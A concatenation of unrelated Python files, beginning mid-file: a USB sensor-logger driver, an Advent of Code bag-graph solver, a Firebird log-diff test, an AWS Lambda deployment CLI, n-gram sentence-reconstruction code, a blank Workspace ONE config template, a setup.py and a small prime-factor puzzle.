format # send data try: device.write(device.outAddress,self.requestBuffer,1000) # write to device at defined addres, write the buffer with time data ,timeout is 1000s device.read(device.inAddress,64,1000) # read at device address,get the 64 byte long message, timeout is 1000s device.lastTimeSync=int(time.time()) # set the actuel time since when the last sync has been performed except Exception as e: logging.error("Error setting time: %s",e) # Mehtod will delete the internal flash data of the Logger. 
this done by preparing the buffer and send it to the logger def deleteDeviceData(self,device): logging.debug("deleting internal Flash data of USB device at Bus %d Address %d Port Number %d" % (device.bus,device.address,device.port_number)) # set mode self.clearRequestBuffer() self.requestBuffer[0]=0x0d # this mode will delete the flash memory of the device try: device.write(device.outAddress,self.requestBuffer,1000) device.read(device.inAddress,64,1000) device.lastTimeDelete=int(time.time()) except Exception as e: logging.error("Error deleting flash: %s",e) def registerDataListener(self, dataListener): if isinstance(dataListener,DataListener): logging.debug("Registering DataListener %s",type(dataListener).__name__) self.listeners.append(dataListener) def unregisterDataListener(self, dataListener): try: self.listeners.remove(dataListener) except: logging.debug("Unable to deregister DataListener"); # Method checks for the length of device.read(device.inAddress,64,1000). If the length is 10-byte it only containts # the signal strength. If the length is 9-byte it containts Sensor ID, the raw value and the timestamp. (see Protocol.txt) def parseData(self,data): ''' checks if raw data are valid and extracts sensor id, raw value, timestamp and if present signal strength all valid data tuples are returned ''' datapoints=[] pos=-1 logging.debug(data) while pos<63: pos +=1 if data[pos] == 0: continue if data[pos] == 255: # 255 seems to be a end of data marker break; # pos += 25 # continue if (data[pos] == 9 or data[pos] == 10) and pos < 55: # logging.debug("Parser found start mark") sensorid = int.from_bytes([data[pos+1],data[pos+2]], byteorder = 'little', signed=False) rawvalue = int.from_bytes([data[pos+3],data[pos+4]], byteorder = 'big', signed=False) timestamp = int.from_bytes([data[pos+5],data[pos+6],data[pos+7],data[pos+8]], byteorder = 'little', signed=False) signal=None if data[pos] == 10: signal = int.from_bytes([data[pos+9]],byteorder = 'little', signed=False) datapoints.append({'sensorid': sensorid, 'rawvalue': rawvalue, 'timestamp': timestamp+self.TIME_OFFSET, 'signal':signal}) # logging.info("Found Datapoint from sensor %d with value %d" % (sensorid,rawvalue)) pos+=data[pos]-1 continue if (data[pos] == 11 or data[pos] == 12) and pos < 53: sensorid = int.from_bytes([data[pos+1],data[pos+2],data[pos+3],data[pos+4]], byteorder = 'little', signed=False) rawvalue = int.from_bytes([data[pos+5],data[pos+6]], byteorder = 'big', signed=False) timestamp = int.from_bytes([data[pos+7],data[pos+8],data[pos+9],data[pos+10]], byteorder = 'little', signed=False) signal=None if data[pos] == 12: signal = int.from_bytes([data[pos+11]],byteorder = 'little', signed=False) if self.detectUnknownSensors and sensorid not in self.sensors: self.addSensor(sensorid) datapoints.append({'sensorid': sensorid, 'rawvalue': rawvalue, 'timestamp': timestamp+self.TIME_OFFSET, 'signal':signal}) # logging.info("Found Datapoint from sensor %d with value %d" % (sensorid,rawvalue)) pos+=data[pos]-1 continue # logging.debug("Parser: Nothing found at pos %d"%pos) return datapoints # Method to extract the data. It starts by first if any listeners are currently up. # Then checks when was the last time the time has been set on the Logger. # It also resets the internal flash every day. # It prepares the needed buffer message in this case starts the buffer with type-03 (see Protokol.txt). This will trigger # the logger to request the data from the sensors. 
# The data are then ask back with by reading the Logger buffer rawdata=dev.read(dev.inAddress,64,1000) def loop(self): ''' constantly reads data from TL-X00 devices as long as DataListeners are registered. Stops reading when the last Listener deregisters. ''' self.clearRequestBuffer() while len(self.listeners) > 0: for dev in self.devices: logging.debug("Polling device at Bus %d Address %d Port Number %d" % (dev.bus,dev.address,dev.port_number)) # do time sync every 900 sec if int(time.time()) - dev.lastTimeSync > 900: self.setTime(dev) # delete internal flash every day # todo: make interval configurable or count entries if int(time.time()) - dev.lastTimeDelete > 86400: self.deleteDeviceData(dev) readcount=0 founddata=0 while True: try: logging.debug("write and read data from device") self.clearRequestBuffer() self.requestBuffer[0]=3 dev.write(dev.outAddress, self.requestBuffer,1000) # send request to read the sensors time.sleep(0.01) rawdata=dev.read(dev.inAddress,64,1000) # request the result from logger if rawdata[0]==0 and rawdata[1]==0: # no new data break dev.lastTimeDataRead = int(time.time()) # store new time of new retrieved data datapoints = self.parseData(rawdata) # method to get process buffer data into usable data # notify listeners for datapoint in datapoints: sensorid=str(datapoint["sensorid"]) if sensorid not in self.sensors: detected_sensor=self.detectSensor(sensorid) if detected_sensor != False: if self.validateSensorData(datapoint, detected_sensor): self.addSensor(detected_sensor) if sensorid in self.sensors: sensor=self.sensors[sensorid] if self.validateSensorData(datapoint, sensor): for l in self.listeners: l.onNewData(datapoint, sensor) # invoke method to share new data to the listerners founddata += len(datapoints) readcount += 1 if founddata == 0 and readcount > 5: raise Exception('device gives nonsense data') elif founddata > 0: dev.deviceErrors = 0 # sleep again before polling device time.sleep(0.01) except Exception as e: raise logging.info("Unable to read new data: %s" % e) # logging.debug(traceback.format_exc()) dev.deviceErrors += 1 if dev.deviceErrors > 10 : logging.warn("Too many errors. Removing device on Bus %d Address %d Port Number %d" % (dev.bus,dev.address,dev.port_number)) self.devices.remove(dev) # untested! break # do not busy poll. Sleep one second logging.debug("sleeping") time.sleep(4) if math.floor(time.time()) > self.lastDeviceCheck + 60: logging.debug("Checking for new Devices") if self.checkForNewDevices() : self.findDevices() self.initializeDevices() day07/main.py import re def main(): with open('input') as f: containment_graph = read_containment_graph(f) all_containing_bags = containment_graph.ancestors('shiny gold') print(f'The number of bags that transitively contain shiny gold is {len(all_containing_bags) - 1}') bags_in_shiny_gold = containment_graph.descendants_weight('shiny gold') - 1 print(f'The number of bags you must carry inside your shiny gold bag is {bags_in_shiny_gold}') def read_containment_graph(iterable): graph = Graph() for line in iterable: edges = parse_rule(line.strip()) graph.add_edges(edges) return graph def parse_rule(rule_string): if re.match(r'^([a-z ]+) bags contain no other bags.$', rule_string): return [] match = re.match(r'^([a-z ]+) bags contain ', rule_string) groups = match.groups() src_colour = groups[0] start_index = len(match.group(0)) rule_string = rule_string[start_index:] edges = [] while len(rule_string) > 0: match = re.match(r'^(\d)+ ([a-z ]+) bags?[,.] 
?', rule_string) groups = match.groups() count = int(groups[0]) dst_colour = groups[1] edges.append(Edge(src_colour, dst_colour, count)) start_index = len(match.group(0)) rule_string = rule_string[start_index:] return edges class Graph: def __init__(self): self._adjacency = {} self._ancestry = {} self._weights = {} def add_edge(self, edge): forward_neighbours = self._adjacency.setdefault(edge.src, []) forward_neighbours.append(edge.dst) backward_neighbours = self._ancestry.setdefault(edge.dst, []) backward_neighbours.append(edge.src) self._weights[(edge.src, edge.dst)] = edge.weight def add_edges(self, edges): for edge in edges: self.add_edge(edge) def ancestors(self, root): ancestors = set() return self._ancestors(root, ancestors) def _ancestors(self, node, ancestors): if node in ancestors: return ancestors.add(node) direct_ancestors = self._ancestry.get(node, []) for direct_ancestor in direct_ancestors: self._ancestors(direct_ancestor, ancestors) return ancestors def descendants_weight(self, root): visited = set() return self._descendants_weight(root, visited) def _descendants_weight(self, node, visited): direct_descendants = self._adjacency.get(node, []) descendants_weight = 0 for direct_descendant in direct_descendants: descendants_weight += self._weights[(node, direct_descendant)] * self._descendants_weight(direct_descendant, visited) return 1 + descendants_weight class Edge: def __init__(self, src, dst, weight): self.src = src self.dst = dst self.weight = weight def __eq__(self, other): return (self.src == other.src and self.dst == other.dst and self.weight == other.weight) if __name__ == '__main__': main() #coding:utf-8 # # id: bugs.core_3188 # title: page 0 is of wrong type (expected 6, found 1) # decription: # Confirmed on WI-V2.5.0.26074 # exception: # DatabaseError: # Error while commiting transaction: # - SQLCODE: -902 # - database file appears corrupt (C:\\MIX\\FIREBIRD\\QA\\FBT-REPO\\TMP\\BUGS.CORE_3188.FDB) # - wrong page type # - page 0 is of wrong type (expected 6, found 1) # -902 # 335544335 # # New messages in firebird.log in 2.5.0 after running ticket statements: # # CSPROG (Client) Mon Feb 15 07:28:05 2016 # INET/inet_error: connect errno = 10061 # CSPROG Mon Feb 15 07:41:02 2016 # Shutting down the server with 0 active connection(s) to 0 database(s), 1 active service(s) # # tracker_id: CORE-3188 # min_versions: ['2.5.1'] # versions: 2.5.1 # qmid: None import pytest from difflib import unified_diff from firebird.qa import db_factory, python_act, Action # version: 2.5.1 # resources: None substitutions_1 = [] init_script_1 = """""" db_1 = db_factory(sql_dialect=3, init=init_script_1) # test_script_1 #--- # # import os # import difflib # # os.environ["ISC_USER"] = user_name # os.environ["ISC_PASSWORD"] = # # engine = str(db_conn.engine_version) # db_conn.close() # # # #--------------------------------------------- # # def flush_and_close(file_handle): # # https://docs.python.org/2/library/os.html#os.fsync # # If you're starting with a Python file object f, # # first do f.flush(), and # # then do os.fsync(f.fileno()), to ensure that all internal buffers associated with f are written to disk. # global os # # file_handle.flush() # if file_handle.mode not in ('r', 'rb'): # # otherwise: "OSError: [Errno 9] Bad file descriptor"! 
# os.fsync(file_handle.fileno()) # file_handle.close() # # #-------------------------------------------- # # def cleanup( f_names_list ): # global os # for i in range(len( f_names_list )): # if os.path.isfile( f_names_list[i]): # os.remove( f_names_list[i] ) # if os.path.isfile( f_names_list[i]): # print('ERROR: can not remove file ' + f_names_list[i]) # # #-------------------------------------------- # # def svc_get_fb_log( engine, f_fb_log ): # # import subprocess # # # ::: NB ::: Service call for receive firebird.log works properly only since FB 2.5.2! # # if engine.startswith('2.5'): # get_firebird_log_key='action_get_ib_log' # else: # get_firebird_log_key='action_get_fb_log' # # subprocess.call([ context['fbsvcmgr_path'], # "localhost:service_mgr", # get_firebird_log_key # ], # stdout=f_fb_log, stderr=subprocess.STDOUT # ) # return # # #-------------------------------------------- # # # # Start two attachments: # con1 = kdb.connect(dsn=dsn) # con2 = kdb.connect(dsn=dsn) # # # Session-1: # c1 = con1.cursor() # # # f_fblog_before=open( os.path.join(context['temp_directory'],'tmp_3188_fblog_before.txt'), 'w') # svc_get_fb_log( engine, f_fblog_before ) # flush_and_close( f_fblog_before ) # # c1.execute("create table test(id int primary key)") # con1.commit() # # # Session-2: # # c2 = con2.cursor() # c2.execute('drop table test') # con2.commit() # # # cleanup # con1.close() # con2.close() # # f_fblog_after=open( os.path.join(context['temp_directory'],'tmp_3188_fblog_after.txt'), 'w') # svc_get_fb_log( engine, f_fblog_after ) # flush_and_close( f_fblog_after ) # # # Now we can compare two versions of firebird.log and check their difference. # # oldfb=open(f_fblog_before.name, 'r') # newfb=open(f_fblog_after.name, 'r') # # difftext = ''.join(difflib.unified_diff( # oldfb.readlines(), # newfb.readlines() # )) # oldfb.close() # newfb.close() # # f_diff_txt=open( os.path.join(context['temp_directory'],'tmp_3188_diff.txt'), 'w') # f_diff_txt.write(difftext) # flush_and_close( f_diff_txt ) # # # Difference of firebird.log should be EMPTY: # # with open( f_diff_txt.name,'r') as f: # print( f.read() ) # f.close() # # ############################### # # Cleanup. 
# cleanup( [i.name for i in (f_fblog_before, f_fblog_after, f_diff_txt)] ) # # #--- act_1 = python_act('db_1', substitutions=substitutions_1) @pytest.mark.version('>=2.5.1') def test_1(act_1: Action): with act_1.connect_server() as srv: srv.info.get_log() log_before = srv.readlines() with act_1.db.connect() as con1, act_1.db.connect() as con2: c1 = con1.cursor() c1.execute("create table test(id int primary key)") con1.commit() # c2 = con2.cursor() c2.execute('drop table test') con2.commit() srv.info.get_log() log_after = srv.readlines() assert list(unified_diff(log_before, log_after)) == [] kilometercreative/Drizzledrz/methods.py import os import json import zipfile import base64 import time from functools import reduce from .command import Command from .aws import config_profile, aws from .helper import DrizzleWrapper, path_to, conflicting_exists, write_replacing, contents_of, zip_into from .errors import DrizzleException # TODO it just doesn't work yet def drizzle_help(pos, named, flags): if len(pos) > 0: print("Retrieving help for %s" % pos[0]) else: print("Commands: ") for c in COMMANDS: print("%s - %s" % (c.name, c.docs()['description'])) def setup(pos, named, flags): p_deploy = path_to(".deploy") p_lib = path_to("lib") p_shared = path_to("shared") p_drizzle = path_to("drizzle.json") if conflicting_exists(p_deploy, p_lib, p_shared, p_drizzle): return os.makedirs(p_deploy) os.makedirs(p_lib) os.makedirs(p_shared) profile = named.get("profile") if not profile: profile = input("AWS Profile Name [default]: ") or "default" region = named.get("region") if not region: region = input("AWS Region [us-west-2]: ") or "us-west-2" config_profile(profile) write_replacing(path_to("drizzle.json", loc="templates"), p_drizzle, replacements={"$profile": profile, "$region": region}) def add(pos, named=None, flags=None): if len(pos) != 1: return print("Usage: drz add ") name = pos[0] role_name = '%s_drizzle' % name p_fun = path_to(name) if conflicting_exists(p_fun): return os.makedirs(p_fun) write_replacing(path_to("config.json", loc="templates"), path_to(name, "config.json"), replacements={"$1": name}) write_replacing(path_to("starter.py", loc="templates"), path_to(name, "__init__.py"), replacements={"$1": name}) iam = aws('iam') role_arn = iam.create_role(RoleName=role_name, AssumeRolePolicyDocument=contents_of(path_to("lambda_trust", loc="templates")) )["Role"]["Arn"] iam.put_role_policy(RoleName=role_name, PolicyName='lambda_logs', PolicyDocument=contents_of(path_to("lambda_policy", loc="templates"))) build([name], None, None) print("Waiting 15 seconds for newly-created role to go live...") time.sleep(15) # wait for IAM role to go live with open(path_to('.deploy/build/%s.zip' % name), 'rb') as bundle: aws('lambda').create_function( FunctionName=name, Runtime='python3.6', Role=role_arn, Handler='%s.lambda_handler' % name, Description='Created by drizzle', Code={'ZipFile': bundle.read()}) def build(pos, named, flags): # Able to run from: # - command line, within function (with or without pos[0] as name) # - project, supplying pos[0] as name of function # if drizzle function if len(pos) > 0: name = pos[0] else: name = os.path.basename(os.getcwd()) os.chdir("..") p_config = path_to(name, "config.json") if not os.path.exists(p_config): raise DrizzleException("Couldn't find config.json for function '%s'" % name) config = DrizzleWrapper("config.json", p_config) # create build folder if it doesn't exist p_build = path_to('.deploy/build') if not os.path.exists(p_build): os.mkdir(p_build) # create build zip 
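# Added note (best-effort reading of the calls below, not documented behaviour): the zip
# bundle assembled here is the artifact that `add` uploads via create_function() and that
# `deploy` later re-uploads via update_function_code(). It contains a BUILD.md taken from
# the templates directory, the function's own folder, the shared/ folder, and the lib/
# folder, all filtered by the "exclude" list in the function's config.json, with lib/
# additionally restricted to the "include" list.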
bundle = zipfile.ZipFile('.deploy/build/%s.zip' % name, 'w', zipfile.ZIP_DEFLATED) bundle.writestr("BUILD.md", contents_of(path_to("BUILD.md", loc="templates"))) zip_into(bundle, path_to(name), config["exclude"]) zip_into(bundle, path_to("shared"), config["exclude"]) zip_into(bundle, path_to("lib"), config["exclude"], include=config["include"]) bundle.close() def deploy(pos, named, flags): # Able to run from: # - command line, within function (with or without pos[0] as name) # - project, supplying pos[0] as name of function if len(pos) > 0: name = pos[0] else: name = os.path.basename(os.getcwd()) os.chdir("..") build([name], None, None) lam = aws('lambda') with open(path_to('.deploy/build/%s.zip' % name), 'rb') as bundle: lam.update_function_code( FunctionName=name, ZipFile=bundle.read()) with open(path_to(name, 'config.json'), 'r') as config_file: config = json.load(config_file)["aws"] payload = { "FunctionName": config["function-name"], "Handler": config["handler"], "Description": config["description"], "Timeout": config["timeout"], "MemorySize": config["memory-size"], "Environment": config["environment"] } lam.update_function_configuration(**payload) def test(pos, named, flags): # Able to run from: # - command line, within function (with or without pos[0] as name) # - project, supplying pos[0] as name of function if len(pos) > 0: name = pos[0] else: name = os.path.basename(os.getcwd()) os.chdir("..") lam = aws('lambda') p_test = path_to('.deploy', 'tests', '%s.json' % name) if not os.path.exists(p_test): raise DrizzleException("Couldn't find %s.json in .deploy/tests" % name) with open(p_test, 'r') as tests: filtered_tests = "".join(filter(lambda l: not l.startswith("//"), tests.readlines())) results = lam.invoke(FunctionName=name, LogType='Tail', Payload=bytes(filtered_tests, encoding='utf-8')) print("*** RESPONSE ***") print("\n*** STATUS ***") print(results["StatusCode"]) print("\n*** LOGS ***") print(str(base64.b64decode(results['LogResult']), encoding="utf-8")) print("\n*** PAYLOAD ***") print(results["Payload"].read()) # Compile commands into dictionary COMMANDS = [ Command(drizzle_help, "help", "help.json"), Command(setup, "setup", "setup.json", args=["profile", "region"]), Command(add, "add", "add.json"), Command(build, "build", "build.json"), Command(deploy, "deploy", "deploy.json"), Command(test, "test", "test.json"), ] COMMAND_MAP = reduce(lambda acc, c: {**acc, c.name: c}, COMMANDS, {}) # from allImports import * # from app.logic import databaseInterface # from app.logic.getAuthUser import AuthorizedUser # from app.logic.getAll import GetAll # @app.route("/contributors/", methods = ["GET"]) # def contributors(): # # we need to know if the user is authorized to see this # return render_template("snips/nameList.html", # cfg = cfg # ) import itertools from collections import deque, namedtuple from itertools import combinations from typing import Tuple import numpy as np from multiset import Multiset from pathlib import Path from .sentence_reconstruction import ngram_sent_vecs PartialSent = namedtuple("PartialSent", ["multiset", "sent"]) PartialList = namedtuple("PartialList", ["multiset", "trigrams"]) DATA = Path("../data/") MODELS = Path("../models") # def disc(ngram_vecs: np.array): # _, n, d = ngram_vecs.shape # C = 1 / n # output = C * d ** ((n - 1) / 2) * ngram_vecs.prod(axis=1).sum(axis=0, keepdims=True) # return output def disc(ngram_vecs): if ngram_vecs.ndim == 2: # n = 1 _, d = ngram_vecs.shape output = ngram_vecs else: _, n, d = ngram_vecs.shape C = 1 / n # TODO: Check 
the effect of dtype conversions output = ( C * d ** ((n - 1) / 2) * ngram_vecs.astype(np.float64).prod(axis=1) ).astype(np.float32) return output def gen_bvs_i2b( unigram_sents, bigram_vec_repr, word_vecs, word2index, markers=True, start="▷", end="◁", ): for unigram_sent in unigram_sents: pairs = sorted( set( combinations( set(unigram_sent) | set([start, end]) if markers else set(unigram_sent), 2, ) ) ) # generate vectors that correspond to the candidate bigrams bigram_vecs = np.vstack( ngram_sent_vecs( [[pair] for pair in pairs], bigram_vec_repr, word_vecs, word2index, 2 ) ) index2bigram = dict(enumerate(pairs)) yield (bigram_vecs, index2bigram) return def adjacent(partial_sent: namedtuple, bigram: Tuple, bigram_sent: Multiset): if partial_sent.multiset[bigram] < bigram_sent[bigram]: if partial_sent.sent[-1] == bigram[0]: return PartialSent( multiset=partial_sent.multiset + Multiset([bigram]), sent=partial_sent.sent + [bigram[1]], ) if partial_sent.sent[-1] == bigram[1]: return PartialSent( multiset=partial_sent.multiset + Multiset([bigram]), sent=partial_sent.sent + [bigram[0]], ) return False def adjacent_trigram(partial_list: namedtuple, trigram: Tuple, trigram_sent: Multiset): if partial_list.multiset[trigram] < trigram_sent[trigram]: if len(partial_list.trigrams) == 1: first_trigram = list(partial_list.trigrams)[0] common_words = Multiset(first_trigram) & Multiset(trigram) if len(common_words) == 2: first_word = list(Multiset(first_trigram) - common_words)[0] fourth_word = list(Multiset(trigram) - common_words)[0] return PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, *list(common_words)), (*list(common_words), fourth_word), ], ) elif len(partial_list.trigrams) == 2: first_trigram, second_trigram = partial_list.trigrams first_word = first_trigram[0] second_and_third_words = Multiset(first_trigram[1:]) fourth_word = second_trigram[2] if fourth_word in trigram: third_words = list( second_and_third_words & (Multiset(trigram) - Multiset([fourth_word])) ) if len(third_words) == 1: third_word = third_words[0] second_word = list(second_and_third_words - Multiset([third_word]))[ 0 ] fifth_word = list( Multiset(trigram) - Multiset([third_word, fourth_word]) )[0] return PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, second_word, third_word), (second_word, third_word, fourth_word), (third_word, fourth_word, fifth_word), ], ) elif len(third_words) == 2: third_word1, third_word2 = third_words second_word1 = list( second_and_third_words - Multiset([third_word1]) )[0] second_word2 = list( second_and_third_words - Multiset([third_word2]) )[0] fifth_word1 = list( Multiset(trigram) - Multiset([third_word1, fourth_word]) )[0] fifth_word2 = list( Multiset(trigram) - Multiset([third_word2, fourth_word]) )[0] partial_sent1 = PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, second_word1, third_word1), (second_word1, third_word1, fourth_word), (third_word1, fourth_word, fifth_word1), ], ) partial_sent2 = PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, second_word2, third_word2), (second_word2, third_word2, fourth_word), (third_word2, fourth_word, fifth_word2), ], ) return [partial_sent1, partial_sent2] else: last_trigram = partial_list.trigrams[-1] if len(Multiset(last_trigram[1:]) & Multiset(trigram)) >= 2: third_last_word, second_last_word = last_trigram[1:] last_word = list(Multiset(trigram) - Multiset(last_trigram[1:]))[0] return 
PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=partial_list.trigrams + [(third_last_word, second_last_word, last_word)], ) return False def get_candidate_sents(bigram_sent: Multiset, start_token="▷", end_token="◁"): def gen_candidates(start_partial_sents, bigram_sent): # contains lists of enumerated ordered bigrams that could # potentially form sentences. candidates = [] max_len = 0 # length of the longest candidate for start_partial_sent in start_partial_sents: Q = deque([start_partial_sent]) while len(Q) > 0: if len(Q) > 1000: return [] partial_sent = Q.popleft() if len(partial_sent.sent) > max_len: max_len = len(partial_sent.sent) candidates = [partial_sent] if len(partial_sent.sent) == max_len: candidates.append(partial_sent) for bigram in bigram_sent: partial_sent_new = adjacent(partial_sent, bigram, bigram_sent) if partial_sent_new and (partial_sent_new not in Q): Q.append(partial_sent_new) # list( # map( # print, # [ # " ".join(q.sent) # + "\n" # # + "\n".join(map(str, q.multiset.items())) # for q in Q # ], # ) # ) # input() return candidates start_partial_sents = [ PartialSent( multiset=Multiset([bigram]), sent=[bigram[1] if bigram[0] == start_token else bigram[0]], ) for bigram in bigram_sent if start_token in bigram ] candidates = gen_candidates(start_partial_sents, bigram_sent) candidate_sents = [] if candidates: for candidate in candidates: bigram_sent_rest = bigram_sent - candidate.multiset end_partial_sents = [ PartialSent( multiset=Multiset([bigram]), sent=[bigram[1] if bigram[0] == end_token else bigram[0]], ) for bigram in bigram_sent_rest if end_token in bigram ] if not end_partial_sents: candidate_sents.append(candidate.sent) else: candidates_reversed = gen_candidates( end_partial_sents, bigram_sent_rest ) candidate_sents.extend( [ candidate.sent + candidate_reversed.sent[::-1] for candidate_reversed in candidates_reversed ] ) else: end_partial_sents = [ PartialSent( multiset=Multiset([bigram]), sent=[bigram[1] if bigram[0] == end_token else bigram[0]], ) for bigram in bigram_sent if end_token in bigram ] if end_partial_sents: candidates_reversed = gen_candidates(end_partial_sents, bigram_sent) candidate_sents.extend( [ candidate_reversed.sent[::-1] for candidate_reversed in candidates_reversed ] ) # remove markers, and concatenate the words to form # sentences candidate_sents = list( set( tuple( [start_token] + [ word for word in candidate_sent if word not in {start_token, end_token} ] + [end_token] ) for candidate_sent in candidate_sents ) ) return candidate_sents def get_candidate_trigrams(candidate_sents): candidate_trigrams = sorted( set( itertools.chain.from_iterable( ( (candidate_sent[i], candidate_sent[i + 1], candidate_sent[i + 2]) for i in range(len(candidate_sent) - 2) ) for candidate_sent in candidate_sents ) ) ) return candidate_trigrams def get_candidate_sents_trigrams( trigram_sent: Multiset, start_token="▷", end_token="◁" ): def gen_candidates(start_partial_lists, trigram_sent): # contains lists of PartialList objects that could # potentially form sentences. 
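# Added note (hedged summary of the loop below): this is a breadth-first search over
# trigram adjacency. Each PartialList in the deque Q holds the multiset of trigrams
# consumed so far plus an ordered trigram chain; adjacent_trigram() tries to extend a
# chain by one word, the queue is capped at 1000 entries to bail out on pathological
# inputs, and only the longest chains found are kept as candidates. Illustration taken
# from the doctest further below:
#   start:  [('▷', '2', '1')]
#   extend: [('▷', '2', '1'), ('2', '1', '3')]   after consuming ('1', '2', '3')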
candidates = [] max_len = 0 # length of the longest candidate for start_partial_list in start_partial_lists: Q = deque([start_partial_list]) # with tqdm(total=len(trigram_sent)) as pbar: while len(Q) > 0: if len(Q) > 1000: return [] partial_list = Q.popleft() if len(partial_list.trigrams) > max_len: # pbar.update(len(partial_list.trigrams) - max_len) max_len = len(partial_list.trigrams) candidates = [partial_list] if len(partial_list.trigrams) == max_len: candidates.append(partial_list) for trigram in trigram_sent: result = adjacent_trigram(partial_list, trigram, trigram_sent) if type(result) is list: for partial_list_new in result: if partial_list_new not in Q: Q.append(partial_list_new) # print(Q) # input() elif type(result).__name__ == "PartialList" and (result not in Q): Q.append(result) # print(Q) # input() return candidates start_partial_lists = [ PartialList(multiset=Multiset([trigram]), trigrams=[trigram]) for trigram in trigram_sent if start_token in trigram ] # A list of PartialList objects candidates = gen_candidates(start_partial_lists, trigram_sent) # contains a sentences. May include start or end tokens candidate_sents = [] def gen_sent(trigrams): if trigrams: return list(trigrams[0]) + [trigram[2] for trigram in trigrams[1:]] else: return [] if candidates: for candidate in candidates: partial_sent = gen_sent(candidate.trigrams) trigram_sent_rest = trigram_sent - candidate.multiset end_partial_lists = [ PartialList(multiset=Multiset([trigram]), trigrams=[trigram]) for trigram in trigram_sent_rest if end_token in trigram ] if not end_partial_lists: candidate_sents.append(partial_sent) else: candidates_reversed = gen_candidates( end_partial_lists, trigram_sent_rest ) candidate_sents.extend( [ partial_sent + gen_sent( [ trigram[::-1] for trigram in candidate_reversed.trigrams[::-1] ] ) if partial_sent[-1] != candidate_reversed.trigrams[-1][-1] else partial_sent + gen_sent( [ trigram[::-1] for trigram in candidate_reversed.trigrams[::-1][1:] ] ) for candidate_reversed in candidates_reversed ] ) else: end_partial_lists = [ PartialList(multiset=Multiset([trigram]), trigrams=[trigram]) for trigram in trigram_sent if end_token in trigram ] if end_partial_lists: candidates_reversed = gen_candidates(end_partial_lists, trigram_sent) candidate_sents.extend( [ gen_sent( [trigram[::-1] for trigram in candidate_reversed.trigrams[::-1]] ) for candidate_reversed in candidates_reversed ] ) # remove markers, and concatenate the words to form # sentences candidate_sents = list( set( tuple( word for word in candidate_sent if word not in {start_token, end_token} ) for candidate_sent in candidate_sents ) ) return candidate_sents ######### # Tests # ######### ## adjacent_trigram """ >>> trigram_sent = Multiset( { ("▷", "2", "1"): 1, ("1", "2", "3"): 1, ("3", "2", "1"): 1, ("3", "1", "5"): 1, ("1", "5", "6"): 1, ("5", "6", "7"): 1, ("6", "7", "8"): 1, ("7", "8", "9"): 1, ("8", "9", "◁"): 1, } ) >>> partial_list1 = PartialList(multiset=Multiset([("▷", "2", "1")]), trigrams=[("▷", "2", "1")]) >>> print(partial_list1) PartialList(multiset=Multiset({('▷', '2', '1'): 1}), trigrams=[('▷', '2', '1')]) >>> partial_list2 = adjacent_trigram(partial_list1, ("1", "2", "3"), trigram_sent) >>> print(partial_list2) PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1}), trigrams=[('▷', '2', '1'), ('2', '1', '3')]) >>> partial_list3 = adjacent_trigram(partial_list2, ("3", "2", "1"), trigram_sent) >>> print(partial_list3) [PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1, ('3', 
'2', '1'): 1}), trigrams=[('▷', '1', '2'), ('1', '2', '3'), ('2', '3', '1')]), PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1, ('3', '2', '1'): 1}), trigrams=[('▷', '2', '1'), ('2', '1', '3'), ('1', '3', '2')])] >>> partial_list4 = adjacent_trigram(partial_list3[0], ("3", "1", "5"), trigram_sent) >>> print(partial_list4) PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1, ('3', '2', '1'): 1, '3': 1, '1': 1, '5': 1}), trigrams=[('▷', '1', '2'), ('1', '2', '3'), ('2', '3', '1'), ('3', '1', '5')]) >>> partial_list4 = adjacent_trigram(partial_list3[1], ("3", "1", "5"), trigram_sent) >>> print(partial_list4) False """ ## get_candidate_sents_trigrams # Host url to make the call against HOST_URL = '' PORT = 443 # Represents WS1 _numeric_ organization group-ID TENANT_GROUP_ID = '' # The WS1 REST API tenant code AW_TENANT_CODE = '' # Username and Password to access WS1 REST APIs API_USERNAME = '' API_PASSWORD = '' # List of assignment groups in WS1 UEM for Alpha deployment, enclose the Ids between single quotes ALPHA_GROUPS = [] # List of assignment groups in WS1 UEM for Beta deployment, enclose the Ids between single quotes BETA_GROUPS = [] # List of assignment groups in WS1 UEM for Production deployment, enclose the Ids between single quotes PRODUCTION_GROUPS = [] # POST_SCRIPT_VALIDATION : 1 => When set to 1, after uploading and publishing the product, the script will fetch # the details of the uploaded product and validate: # Product is in Active State # Product is uploaded in the same OG as mentioned in the config file # Product is assigned to the same Smart Groups as mentioned in the config file # : 0 => When set to 0. It will just upload and publish the product. Validations will not be # done. POST_SCRIPT_VALIDATION = 1 # ---------------------------------------------------------------------------------------------------------------------- # Build Server Details # Fill in the following details if this python script needs to be integrated with the build server. # If the build pipeline used is Jenkins, pass the script name "jenkins_build_information.py 1" in place of build number # Build server url where the app build is run BUILD_SERVER_URL = '' # Build project name BUILD_PROJECT_NAME = '' # Username to login to the build server BUILD_SERVER_USERNAME = '' # Password to login to the build server BUILD_SERVER_PASSWORD = ''sarmientoF/grader from setuptools import setup, find_packages setup( name='grader', version='1.0.0', description='Matlab Grader management package', url='/sarmientoF/grader.git', author='', author_email='', license='unlicense', package_dir={"": "lib"}, packages=find_packages("lib"), zip_safe=False, install_requires=[ "GitPython", "lxml", ] ) n_max = 150000 f = [0] * n_max for n in range(2, n_max - 4): if f[n] == 0: f[n::n] = [x + 1 for x in f[n::n]] elif f[n:n + 4] == [4, 4, 4, 4]: ans = n break print(ans) # Copyright Junipyr. All rights reserved. 
